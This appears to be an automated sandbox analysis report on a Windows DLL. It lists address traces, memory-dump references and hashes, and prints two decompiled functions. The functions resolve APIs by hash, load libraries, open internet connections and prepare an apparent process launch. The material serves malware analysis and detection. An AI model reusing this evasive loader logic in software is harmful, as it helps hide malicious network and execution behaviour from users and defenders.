0x6e9f5c3b
0x6e9f5c42
0x6e9f5c58
0x6e9f5c5a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c63
0x6e9f5c66
0x6e9f5c69
0x6e9f5c77
0x6e9f5c81
0x6e9f5c8d
0x6e9f5c8f
0x6e9f5c96
0x6e9f5c9b
0x6e9f5ca0
0x6e9f5ca2
0x6e9f5ca2
0x6e9f5ca4
0x6e9f5ca9
0x6e9f5cae
0x6e9f5cb2
0x6e9f5cba
0x6e9f5cc3
0x6e9f5cc3
0x6e9f5cc8
0x6e9f5cc9
0x6e9f5cc9
0x6e9f5ca4
0x6e9f5ca0
0x6e9f5cd3
0x6e9f5cd8
0x6e9f5cdc
0x6e9f5cde
0x6e9f5ce6
0x6e9f5ce6
0x6e9f5c44
0x6e9f5c44
0x6e9f5c4f
0x6e9f5c52
0x00000000
0x00000000
0x6e9f5c52
0x6e9f5c42
0x6e9f5c35
0x6e9f5c2d
0x6e9f5dd5
0x6e9f5de1
0x6e9f5ded
0x6e9f5df9
0x6e9f5dfe
0x6e9f5e0a
0x6e9f57bb
0x6e9f57c2
0x6e9f57c4
0x00000000
0x6e9f57ca
0x6e9f57ca
0x6e9f57cc
0x00000000
0x6e9f57d2
0x6e9f57dc
0x6e9f57e4
0x6e9f57e7
0x6e9f57f5
0x6e9f5809
0x6e9f580b
0x6e9f580d
0x6e9f5813
0x6e9f5813
0x6e9f581a
0x6e9f5821
0x6e9f5821
0x6e9f5823
0x6e9f5828
0x6e9f5834
0x6e9f5844
0x6e9f5849
0x6e9f584e
0x6e9f5854
0x6e9f5854
0x6e9f5859
0x6e9f585e
0x6e9f5863
0x6e9f586a
0x6e9f586e
0x6e9f5873
0x6e9f5878
0x6e9f5888
0x6e9f588d
0x6e9f5896
0x6e9f58b7
0x6e9f58be
0x6e9f58d0
0x6e9f58df
0x6e9f58e4
0x6e9f58e6
0x00000000
0x00000000
0x6e9f5996
0x6e9f5996
0x6e9f58ec
0x6e9f58ed
0x6e9f58ee
0x6e9f58ef
0x6e9f58f0
0x6e9f58f2
0x6e9f58f3
0x6e9f58f4
0x6e9f58f5
0x6e9f58f9
0x6e9f58fd
0x6e9f58fe
0x6e9f58fe
0x6e9f57cc
0x6e9f57c4
0x6e9f5658
0x6e9f565f
0x6e9f566b
0x6e9f5677
0x6e9f5683
0x6e9f5688
0x6e9f5694
0x6e9f5694

APIs

LoadLibraryW.KERNELBASE(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 6E9F562E

Strings

)V, xrefs: 6E9F55D2

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: )V
API String ID: 1029625771-578813878
Opcode ID: fc395b27d90f3d3d11e798327920b406413a8af7ca22901b407447d18f7f1968
Instruction ID: 8ef2fc42286a2dd6bb61ce85d4a2f7f5f991bf557ee1ad565fa8b5e964d5637f
Opcode Fuzzy Hash: fc395b27d90f3d3d11e798327920b406413a8af7ca22901b407447d18f7f1968
Instruction Fuzzy Hash: 1531A13111C244CBC775ABE4DA51BEEB3E9AF9430CF408C28D59646190EF30D986CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F54F5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E9F54F5() {
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t127;
				intOrPtr _t128;
				intOrPtr* _t132;
				void* _t147;
				void* _t157;
				intOrPtr _t160;
				signed int _t170;
				signed int _t174;
				void* _t189;
				intOrPtr* _t190;
				signed int _t193;
				unsigned int _t197;
				intOrPtr _t200;
				signed short* _t201;
				signed int _t204;
				void* _t222;
				signed int _t226;
				signed int _t229;
				signed int _t230;
				intOrPtr* _t256;
				intOrPtr* _t264;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				void* _t328;
				signed int _t329;
				signed int _t332;
				void* _t334;
				signed int _t335;
				intOrPtr _t338;
				void* _t341;
				intOrPtr* _t344;

				E6EA08CA0(_t344 + 0xe4);
				E6EA08CA0(_t344 + 0x118);
				if(1 == 0) {
					_t226 = 0;
					__eflags = 0;
				} else {
					_t226 = 1;
				}
				E6E9FAC00(_t344 + 0x120, 2);
				E6EA0D980(_t344 + 0x128, _t344 + 0x130, 0x7e);
				E6EA08CA0(_t344 + 0x120);
				if( *(_t344 + 0x130) > 0) {
					 *_t344 = _t338;
					_t329 = _t344 + 0x130;
					L6:
					while(1) {
						L6:
						while(1) {
							L6:
							if(L6EA015C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E6EA17600(_t329, _t332))); // executed
							}
							_t222 =  *(_t344 + 0x130);
							while(1) {
								_t332 = 1;
								if(1 >= _t222) {
									break;
								}
								if(1 != 4) {
									goto L6;
								} else {
									_t316 =  *0x6ea2b02a & 0x000000ff;
									if(( *0x6ea2b02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L6;
									}
								}
								goto L14;
							}
							_t338 =  *_t344;
							goto L14;
						}
					}
				}
				L14:
				__eflags =  *((intOrPtr*)(_t338 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t338 + 0x2c)) != 2) {
					__eflags =  *0x6ea2b028 & 0x000000ff;
					if(( *0x6ea2b028 & 0x000000ff) == 0) {
						__eflags =  *0x6ea2b265 & 0x000000ff;
						if(( *0x6ea2b265 & 0x000000ff) == 0) {
							__eflags =  *0x6ea2b1cc - 1;
							if( *0x6ea2b1cc != 1) {
								_t200 =  *0x6ea2b1d0; // 0x900980
								_t201 =  *(_t200 + 4);
								_t316 =  *_t201 & 0x0000ffff;
								__eflags = ( *_t201 & 0x0000ffff) - 0x2d;
								if(( *_t201 & 0x0000ffff) != 0x2d) {
									E6EA08AB0(_t344 + 0xcc, _t201, 0);
									_push(0x80);
									_push(0);
									E6EA1A4E0(_t344 + 0x68, __eflags,  *((intOrPtr*)(_t344 + 0xd0)), 1);
									_t204 = E6EA1BEA0(_t344 + 0x64, _t316, _t332);
									__eflags = _t204;
									if(_t204 == 0) {
										__eflags =  *((char*)(_t344 + 0x68));
										if( *((char*)(_t344 + 0x68)) != 0) {
											E6EA1BE30(_t344 + 0x64, _t332);
										}
										E6EA08CA0(_t344 + 0x58);
										_t335 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E6EA1A730(_t344 + 0xc4, _t316);
											if(__eflags == 0) {
												break;
											}
											E6EA022A0(0x64, _t316);
											_t335 = _t335 + 1;
											__eflags = _t335 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t332 = _t344 + 0xcc;
										do {
											E6EA0AE80(_t344 + 0xcc, __eflags, _t332, 0x5c);
											E6EA08CC0(_t344 + 0xc8,  *(_t344 + 0xcc));
											E6EA08CA0(_t332);
											__eflags = E6EA1A730(_t344 + 0xc4, _t316);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t344 + 0x68));
										if( *((char*)(_t344 + 0x68)) != 0) {
											E6EA1BE30(_t344 + 0x64, _t332);
										}
										E6EA08CA0(_t344 + 0x58);
									}
									E6EA08CA0(_t344 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x6ea2b02a & 0x000000ff) - 2;
					if(( *0x6ea2b02a & 0x000000ff) == 2) {
						L43:
						_t109 =  *0x6ea2b1ad; // 0xbaa380
						__eflags = _t109;
						if(_t109 == 0) {
							L45:
							_t110 =  *0x6ea2b1ad; // 0xbaa380
							__eflags = _t110;
							if(_t110 == 0) {
								_push(0x10);
								_t111 = E6EA01030();
								_t344 = _t344 + 4;
								__eflags = _t111;
								if(_t111 != 0) {
									_push(0);
									_t112 = E6EA19350(_t111);
								} else {
									_t112 = 0;
								}
								 *0x6ea2b1ad = _t112;
							}
							_t332 =  *0x6ea2b1ad; // 0xbaa380
							__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
							if(( *0x6ea2b02a & 0x000000ff) == 1) {
								_t316 = 0x18f8c844;
								_t329 = _t344 + 0x28;
								E6E9F6AD0(_t226, _t329, 0x18f8c844, _t329, _t332, 1, 0);
								_push(_t329);
								L6EA19520(_t332);
								L6EA19510(_t329);
							} else {
								E6EA19710(_t332, 0x6ea2b02d,  *0x6ea2b02b & 0x0000ffff);
							}
						} else {
							_t281 =  *0x6ea2b1ad; // 0xbaa380
							_t174 = E6EA19660(_t281);
							__eflags = _t174;
							if(_t174 != 0) {
								goto L45;
							}
						}
						_t117 =  *0x6ea2b1b1; // 0x0
						__eflags = _t117;
						if(_t117 == 0) {
							L51:
							_t118 =  *0x6ea2b1b1; // 0x0
							__eflags = _t118;
							if(_t118 == 0) {
								_push(0x10);
								_t119 = E6EA01030();
								_t344 = _t344 + 4;
								__eflags = _t119;
								if(_t119 != 0) {
									_push(0);
									_t120 = E6EA19350(_t119);
								} else {
									_t120 = 0;
								}
								 *0x6ea2b1b1 = _t120;
							}
							_t329 =  *0x6ea2b1b1; // 0x0
							__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
							if(( *0x6ea2b02a & 0x000000ff) == 1) {
								_t316 = 0x11041f01;
								E6E9F6AD0(_t226, _t344 + 0x38, 0x11041f01, _t329, _t332, 1, 1);
								_push(_t344 + 0x38);
								L6EA19520(_t329);
								L6EA19510(_t344 + 0x38);
								_t127 = E6EA19650(_t329);
								__eflags = _t127;
								if(_t127 != 0) {
									_t316 = 0xd3ef7577;
									E6E9F6AD0(_t226, _t344 + 8, 0xd3ef7577, _t329, _t332, 0, 0);
									L6EA19510(_t344);
								}
							} else {
								_t332 =  *0x6ea2b1c4; // 0x6e9f0000
								__eflags =  *((char*)(E6EA03930(_t226, 0, _t329, _t332) + 0xb)) - 0x20;
								_t325 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t316 = _t332;
								E6E9F9090(_t344 + 0x88, _t332,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t344 + 0x88);
								L6EA19520(_t329);
								L6EA19510(_t344 + 0x88);
							}
						} else {
							_t279 =  *0x6ea2b1b1; // 0x0
							_t170 = E6EA19660(_t279);
							__eflags = _t170;
							if(_t170 != 0) {
								goto L51;
							}
						}
						_t128 =  *((intOrPtr*)(_t338 + 0x2c));
						__eflags = _t128 - 3;
						if(_t128 == 3) {
							__eflags =  *0x6ea2b1cc - 3;
							if( *0x6ea2b1cc == 3) {
								E6EA08CC0(_t344 + 0x10c,  *((intOrPtr*)( *0x6ea2b1d0 + 8)));
							}
							_t227 = _t344 + 0x48;
							E6EA08810(_t344 + 0x48, 0);
							_t132 = E6EA09890(_t227, _t344 + 0x48, _t316, _t329, _t332, _t227, 0x6ea29428,  *((intOrPtr*)(_t338 + 0x2c)));
							E6EA10220(_t344 + 0x110,  *_t132, 0);
							E6EA08CA0(_t227);
							L6E9F8180(_t332);
						} else {
							__eflags = _t128 - 5;
							if(_t128 != 5) {
								__eflags = _t128 - 6;
								if(__eflags == 0) {
									_t256 = _t344 + 0xa4;
									 *_t256 = 0;
									 *((intOrPtr*)(_t256 + 4)) = 0;
									 *((intOrPtr*)(_t256 + 8)) = 0;
									 *((intOrPtr*)(_t256 + 0xc)) = 0;
									E6EA05B60(_t226, _t256, _t329, _t332, __eflags);
									E6E9F6740(_t344 + 0xa4);
									E6EA01350(0x12);
									__eflags =  *(_t344 + 0xa8);
									if( *(_t344 + 0xa8) > 0) {
										_t229 = 0;
										__eflags = 0;
										do {
											_t147 = E6EA22B00(_t344 + 0xa8, _t229);
											__eflags =  *((char*)(_t147 + 0x3c));
											if( *((char*)(_t147 + 0x3c)) == 0) {
												E6E9F2A40(_t344 + 0x50, _t147);
												E6EA08CA0(_t344 + 0x50);
											}
											_t229 = _t229 + 1;
											__eflags = _t229 -  *(_t344 + 0xa8);
										} while (_t229 <  *(_t344 + 0xa8));
									}
									L6EA22970(_t226, _t344 + 0xa4, _t329);
									_t260 =  *(_t344 + 0xb0);
									__eflags =  *(_t344 + 0xb0);
									if( *(_t344 + 0xb0) != 0) {
										E6E9F2A20(_t260, 1);
									}
								}
							} else {
								__eflags = _t226;
								if(_t226 == 0) {
									__eflags =  *0x6ea2b1cc - 1;
									if(__eflags <= 0) {
										L60:
										_t264 = _t344 + 0x18;
										 *_t264 = 0;
										 *((intOrPtr*)(_t264 + 4)) = 0;
										 *((intOrPtr*)(_t264 + 8)) = 0;
										 *((intOrPtr*)(_t264 + 0xc)) = 0;
										E6EA05B60(_t226, _t264, _t329, _t332, __eflags);
										__eflags = ( *0x6ea2b029 & 0x000000ff) - 1;
										E6E9F7DB0(_t344 + 0x18, 0 | ( *0x6ea2b029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x6ea2b029 & 0x000000ff;
										if(( *0x6ea2b029 & 0x000000ff) != 0) {
											E6EA01350(0x12);
											__eflags =  *(_t344 + 0x1c);
											if( *(_t344 + 0x1c) > 0) {
												_t230 = 0;
												__eflags = 0;
												do {
													_t157 = E6EA22B00(_t344 + 0x1c, _t230);
													__eflags =  *((char*)(_t157 + 0x3c));
													if( *((char*)(_t157 + 0x3c)) == 0) {
														E6E9F2A40(_t344 + 0x10, _t157);
														E6EA08CA0(_t344 + 0x10);
													}
													_t230 = _t230 + 1;
													__eflags = _t230 -  *(_t344 + 0x1c);
												} while (_t230 <  *(_t344 + 0x1c));
											}
										}
										L6EA22970(_t226, _t344 + 0x18, _t329);
										_t267 =  *(_t344 + 0x24);
										__eflags =  *(_t344 + 0x24);
										if( *(_t344 + 0x24) != 0) {
											E6E9F2A20(_t267, 1);
										}
									} else {
										_t160 =  *0x6ea2b1d0; // 0x900980
										__eflags = ( *( *(_t160 + 4)) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L60;
										}
									}
								}
							}
						}
						L6EA18910(_t344 + 0x130, _t329, _t332);
						E6EA08CA0(_t344 + 0x110);
						E6EA08CA0(_t344 + 0x108);
						E6EA07A70(_t344 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x6ea2b027 & 0x000000ff;
						if(( *0x6ea2b027 & 0x000000ff) == 0) {
							goto L43;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								goto L43;
							} else {
								__eflags =  *((char*)(_t338 + 0xb)) - 0x20;
								_t327 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								E6E9F61B0(_t344 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t338 + 0xb)) - 0x20);
								E6EA08810(_t344 + 0x18, 0x200);
								_t284 = L6EA015C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t284;
								if(__eflags != 0) {
									_t197 =  *(_t344 + 0x18) >> 1;
									__eflags = _t197;
									_t327 =  *0x6ea2b1c4; // 0x6e9f0000
									 *_t284(_t327,  *(_t344 + 0x18), _t197);
								}
								_push(0x80);
								_push(0);
								E6EA1A4E0(_t344 + 0x10, __eflags,  *((intOrPtr*)(_t344 + 0x20)), 1);
								L6EA1A520(_t344 + 8, _t327, _t344 + 0x1c, 0);
								__eflags =  *((char*)(_t344 + 0x10));
								if( *((char*)(_t344 + 0x10)) != 0) {
									E6EA1BE30(_t344 + 0xc, _t332);
								}
								__eflags = 0;
								E6EA08CA0(_t344);
								_t334 = _t344 + 0x1a0;
								_t341 = _t344 + 0x2c;
								while(1) {
									E6EA00B70(_t334, 0, 0x44);
									 *((intOrPtr*)(_t344 + 0x1ac)) = 0x44;
									E6EA00B70(_t341, 0, 0x10);
									_t344 = _t344 + 0x18;
									E6EA08810(_t344 + 0x4c, 0);
									_t189 = E6EA096D0(E6EA096D0(E6EA10220(_t344 + 0x50,  *((intOrPtr*)(_t344 + 0x40)), 0), 0x20), 0x22);
									_t190 =  *0x6ea2b1d0; // 0x900980
									E6EA096D0(E6EA10220(_t189,  *_t190, 0), 0x22);
									_t193 = L6EA015C0(0xa1310f65, 0x643f303c);
									__eflags = _t193;
									if(_t193 != 0) {
										break;
									}
									E6EA08CA0(_t344 + 0x48);
								}
								_push(_t341);
								_push(_t334);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t344 + 0x68)));
								_push( *((intOrPtr*)(_t344 + 0x60)));
								asm("int3");
								return _t193;
							}
						}
					}
				} else {
					L6EA18910(_t344 + 0x130, _t328, _t332);
					E6EA08CA0(_t344 + 0x110);
					E6EA08CA0(_t344 + 0x108);
					E6EA07A70(_t344 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x6e9f55a8
0x6e9f55b4
0x6e9f55bb
0x6e9f55c4
0x6e9f55c4
0x6e9f55bd
0x6e9f55bd
0x6e9f55bd
0x6e9f55d2
0x6e9f55e8
0x6e9f55f4
0x6e9f5601
0x6e9f5603
0x6e9f5608
0x00000000
0x6e9f560f
0x00000000
0x6e9f560f
0x6e9f560f
0x6e9f5622
0x6e9f562e
0x6e9f562e
0x6e9f5630
0x6e9f5637
0x6e9f5637
0x6e9f563a
0x00000000
0x00000000
0x6e9f563f
0x00000000
0x6e9f5641
0x6e9f5641
0x6e9f564b
0x00000000
0x6e9f564d
0x00000000
0x6e9f564d
0x6e9f564b
0x00000000
0x6e9f563f
0x6e9f564f
0x00000000
0x6e9f564f
0x6e9f560f
0x6e9f560f
0x6e9f5652
0x6e9f5652
0x6e9f5656
0x6e9f569c
0x6e9f569e
0x6e9f56ab
0x6e9f56ad
0x6e9f56b3
0x6e9f56ba
0x6e9f56c0
0x6e9f56c5
0x6e9f56c8
0x6e9f56cb
0x6e9f56ce
0x6e9f56de
0x6e9f56e3
0x6e9f56e8
0x6e9f56f7
0x6e9f5700
0x6e9f5705
0x6e9f5707
0x6e9f5724
0x6e9f5729
0x6e9f572f
0x6e9f572f
0x6e9f5738
0x6e9f573d
0x6e9f573d
0x6e9f573f
0x6e9f574b
0x6e9f574d
0x00000000
0x00000000
0x6e9f5754
0x6e9f5759
0x6e9f575a
0x6e9f575d
0x00000000
0x00000000
0x00000000
0x6e9f575d
0x6e9f575f
0x6e9f5766
0x6e9f5770
0x6e9f5783
0x6e9f578a
0x6e9f579b
0x6e9f579b
0x6e9f5709
0x6e9f5709
0x6e9f570e
0x6e9f5714
0x6e9f5714
0x6e9f571d
0x6e9f571d
0x6e9f57a6
0x6e9f57a6
0x6e9f56ce
0x6e9f56ba
0x6e9f56ad
0x6e9f57b2
0x6e9f57b5
0x6e9f5b3c
0x6e9f5b3c
0x6e9f5b41
0x6e9f5b43
0x6e9f5b54
0x6e9f5b54
0x6e9f5b59
0x6e9f5b5b
0x6e9f5e33
0x6e9f5e35
0x6e9f5e3a
0x6e9f5e3d
0x6e9f5e3f
0x6e9f5e47
0x6e9f5e49
0x6e9f5e41
0x6e9f5e41
0x6e9f5e41
0x6e9f5e4e
0x6e9f5e4e
0x6e9f5b61
0x6e9f5b6e
0x6e9f5b71
0x6e9f5e0b
0x6e9f5e10
0x6e9f5e1a
0x6e9f5e21
0x6e9f5e22
0x6e9f5e29
0x6e9f5b77
0x6e9f5b86
0x6e9f5b86
0x6e9f5b45
0x6e9f5b45
0x6e9f5b4b
0x6e9f5b50
0x6e9f5b52
0x00000000
0x00000000
0x6e9f5b52
0x6e9f5b92
0x6e9f5b97
0x6e9f5b99
0x6e9f5baa
0x6e9f5baa
0x6e9f5baf
0x6e9f5bb1
0x6e9f5eb0
0x6e9f5eb2
0x6e9f5eb7
0x6e9f5eba
0x6e9f5ebc
0x6e9f5ec4
0x6e9f5ec6
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ecb
0x6e9f5ecb
0x6e9f5bb7
0x6e9f5bc4
0x6e9f5bc7
0x6e9f5e62
0x6e9f5e68
0x6e9f5e73
0x6e9f5e74
0x6e9f5e7d
0x6e9f5e84
0x6e9f5e89
0x6e9f5e8b
0x6e9f5e93
0x6e9f5e9e
0x6e9f5ea6
0x6e9f5ea6
0x6e9f5bcd
0x6e9f5bcf
0x6e9f5be8
0x6e9f5bf1
0x6e9f5bf5
0x6e9f5bf7
0x6e9f5c05
0x6e9f5c06
0x6e9f5c12
0x6e9f5c12
0x6e9f5b9b
0x6e9f5b9b
0x6e9f5ba1
0x6e9f5ba6
0x6e9f5ba8
0x00000000
0x00000000
0x6e9f5ba8
0x6e9f5c1e
0x6e9f5c21
0x6e9f5c24
0x6e9f5d87
0x6e9f5d8e
0x6e9f5ee4
0x6e9f5ee4
0x6e9f5d94
0x6e9f5d9c
0x6e9f5daa
0x6e9f5dbd
0x6e9f5dc4
0x6e9f5dc9
0x6e9f5c2a
0x6e9f5c2a
0x6e9f5c2d
0x6e9f5cf0
0x6e9f5cf3
0x6e9f5cfb
0x6e9f5d02
0x6e9f5d04
0x6e9f5d07
0x6e9f5d0a
0x6e9f5d0d
0x6e9f5d1b
0x6e9f5d25
0x6e9f5d2a
0x6e9f5d32
0x6e9f5d34
0x6e9f5d34
0x6e9f5d36
0x6e9f5d3e
0x6e9f5d43
0x6e9f5d47
0x6e9f5d4f
0x6e9f5d58
0x6e9f5d58
0x6e9f5d5d
0x6e9f5d5e
0x6e9f5d5e
0x6e9f5d36
0x6e9f5d6e
0x6e9f5d73
0x6e9f5d7a
0x6e9f5d7c
0x6e9f5d80
0x6e9f5d80
0x6e9f5d7c
0x6e9f5c33
0x6e9f5c33
0x6e9f5c35
0x6e9f5c3b
0x6e9f5c42
0x6e9f5c58
0x6e9f5c5a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c63
0x6e9f5c66
0x6e9f5c69
0x6e9f5c77
0x6e9f5c81
0x6e9f5c8d
0x6e9f5c8f
0x6e9f5c96
0x6e9f5c9b
0x6e9f5ca0
0x6e9f5ca2
0x6e9f5ca2
0x6e9f5ca4
0x6e9f5ca9
0x6e9f5cae
0x6e9f5cb2
0x6e9f5cba
0x6e9f5cc3
0x6e9f5cc3
0x6e9f5cc8
0x6e9f5cc9
0x6e9f5cc9
0x6e9f5ca4
0x6e9f5ca0
0x6e9f5cd3
0x6e9f5cd8
0x6e9f5cdc
0x6e9f5cde
0x6e9f5ce6
0x6e9f5ce6
0x6e9f5c44
0x6e9f5c44
0x6e9f5c4f
0x6e9f5c52
0x00000000
0x00000000
0x6e9f5c52
0x6e9f5c42
0x6e9f5c35
0x6e9f5c2d
0x6e9f5dd5
0x6e9f5de1
0x6e9f5ded
0x6e9f5df9
0x6e9f5dfe
0x6e9f5e0a
0x6e9f57bb
0x6e9f57c2
0x6e9f57c4
0x00000000
0x6e9f57ca
0x6e9f57ca
0x6e9f57cc
0x00000000
0x6e9f57d2
0x6e9f57dc
0x6e9f57e4
0x6e9f57e7
0x6e9f57f5
0x6e9f5809
0x6e9f580b
0x6e9f580d
0x6e9f5813
0x6e9f5813
0x6e9f581a
0x6e9f5821
0x6e9f5821
0x6e9f5823
0x6e9f5828
0x6e9f5834
0x6e9f5844
0x6e9f5849
0x6e9f584e
0x6e9f5854
0x6e9f5854
0x6e9f5859
0x6e9f585e
0x6e9f5863
0x6e9f586a
0x6e9f586e
0x6e9f5873
0x6e9f5878
0x6e9f5888
0x6e9f588d
0x6e9f5896
0x6e9f58b7
0x6e9f58be
0x6e9f58d0
0x6e9f58df
0x6e9f58e4
0x6e9f58e6
0x00000000
0x00000000
0x6e9f5996
0x6e9f5996
0x6e9f58ec
0x6e9f58ed
0x6e9f58ee
0x6e9f58ef
0x6e9f58f0
0x6e9f58f2
0x6e9f58f3
0x6e9f58f4
0x6e9f58f5
0x6e9f58f9
0x6e9f58fd
0x6e9f58fe
0x6e9f58fe
0x6e9f57cc
0x6e9f57c4
0x6e9f5658
0x6e9f565f
0x6e9f566b
0x6e9f5677
0x6e9f5683
0x6e9f5688
0x6e9f5694
0x6e9f5694

APIs

LoadLibraryW.KERNELBASE(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 6E9F562E

Strings

)V, xrefs: 6E9F55D2

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: )V
API String ID: 1029625771-578813878
Opcode ID: a8c5cb30f7584b05ef1dcebc39283bc3ab09cf0896852ae4365ae6686f7de8b4
Instruction ID: 212d1d27300685686fd4506908421b48e2031df9a4952ed32dbf3daad9b01ace
Opcode Fuzzy Hash: a8c5cb30f7584b05ef1dcebc39283bc3ab09cf0896852ae4365ae6686f7de8b4
Instruction Fuzzy Hash: 6001843101C684CBC3729AD5C9A07EEB3E9AF95308F408C28D5A556190DF74DD87CF86

Uniqueness

Uniqueness Score: -1.00%

Function 6EA23370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6EA23370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E6EA106A0( &(_t254[4]), __ecx, 0);
				E6EA106A0( &(_t254[8]), __ecx, 0);
				E6EA106A0( &(_t254[0xc]), __ecx, 0);
				E6EA106A0( &(_t254[0x10]), __ecx, 0);
				L6EA24D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E6EA08810( &(_t254[0x1e]), 0);
				E6EA087A0( &(_t254[0x20]));
				E6EA087A0( &(_t254[0x24]));
				_t102 = E6EA10220( &(_t254[0x20]), _t254[0x26], 0);
				E6EA087A0( &(_t254[0x28]));
				E6EA10220(_t102, _t254[0x2a], 0);
				E6EA08CA0( &(_t254[0x28]));
				E6EA08CA0( &(_t254[0x24]));
				if(E6EA11000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E6EA1D620(_t242, E6EA16040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(L6EA015C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = L6EA015C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x6ea2b248; // 0xe3a10e7e
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E6EA07F00();
							E6EA08CA0( &(_t254[0x20]));
							E6EA08CA0( &(_t254[0x1c]));
							E6EA10B10( &(_t254[0xe]));
							E6EA10B10( &(_t254[0xa]));
							E6EA10B10( &(_t254[6]));
							E6EA10B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = L6EA015C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
